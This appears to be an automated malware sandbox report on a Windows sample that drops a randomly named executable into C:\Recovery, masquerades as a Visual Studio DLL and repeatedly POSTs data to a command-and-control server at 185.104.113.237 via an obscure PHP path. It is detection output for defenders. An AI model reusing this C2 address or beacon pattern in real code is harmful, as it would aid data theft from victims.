                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1264Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1292Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1276Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1008Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1292Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1008Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1276Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1008Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1000Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1292Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknownHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 336Expect: 100-continueConnection: Keep-Alive
                              Source: izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.000000000346A000.00000004.00000800.00020000.00000000.sdmp, izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.0000000002CF8000.00000004.00000800.00020000.00000000.sdmp, izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.0000000003057000.00000004.00000800.00020000.00000000.sdmp, izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.0000000002F75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.104.113.237
                              Source: izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.0000000002CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.104.113.237/Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/
                              Source: izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.000000000346A000.00000004.00000800.00020000.00000000.sdmp, izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.0000000002CF8000.00000004.00000800.00020000.00000000.sdmp, izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.0000000003057000.00000004.00000800.00020000.00000000.sdmp, izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.0000000002F75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.104.113.237/Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmul
                              Source: izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.000000000346A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.104H
                              Source: 4Osfx7gnSx.exe, 00000000.00000002.2005023300.00000000037BF000.00000004.00000800.00020000.00000000.sdmp, izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.0000000002CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess Stats: CPU usage > 49%
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeCode function: 0_2_00007FF848F20D980_2_00007FF848F20D98
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeCode function: 6_2_00007FF848F10D986_2_00007FF848F10D98
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeCode function: 6_2_00007FF8490E4AB06_2_00007FF8490E4AB0
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeCode function: 6_2_00007FF8490DFC006_2_00007FF8490DFC00
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeCode function: 6_2_00007FF8490DAF0A6_2_00007FF8490DAF0A
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeCode function: 6_2_00007FF8490DC3626_2_00007FF8490DC362
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeCode function: 6_2_00007FF8490E0A356_2_00007FF8490E0A35
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeCode function: 6_2_00007FF8490E4ACA6_2_00007FF8490E4ACA
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeCode function: 6_2_00007FF8490E4ADD6_2_00007FF8490E4ADD
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeCode function: 6_2_00007FF8490D8C386_2_00007FF8490D8C38
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeCode function: 6_2_00007FF8490D58A06_2_00007FF8490D58A0
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeCode function: 6_2_00007FF8490D28C76_2_00007FF8490D28C7
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeCode function: 6_2_00007FF8490DA72B6_2_00007FF8490DA72B
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeCode function: 6_2_00007FF8490D8BB86_2_00007FF8490D8BB8
                              Source: 4Osfx7gnSx.exe, 00000000.00000000.1985266085.0000000000CB6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs 4Osfx7gnSx.exe
                              Source: 4Osfx7gnSx.exe, 00000000.00000002.2007578949.000000001BA12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs 4Osfx7gnSx.exe
                              Source: 4Osfx7gnSx.exe, 00000000.00000002.2007578949.000000001BA12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs 4Osfx7gnSx.exe
                              Source: 4Osfx7gnSx.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs 4Osfx7gnSx.exe
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: apphelp.dllJump to behavior
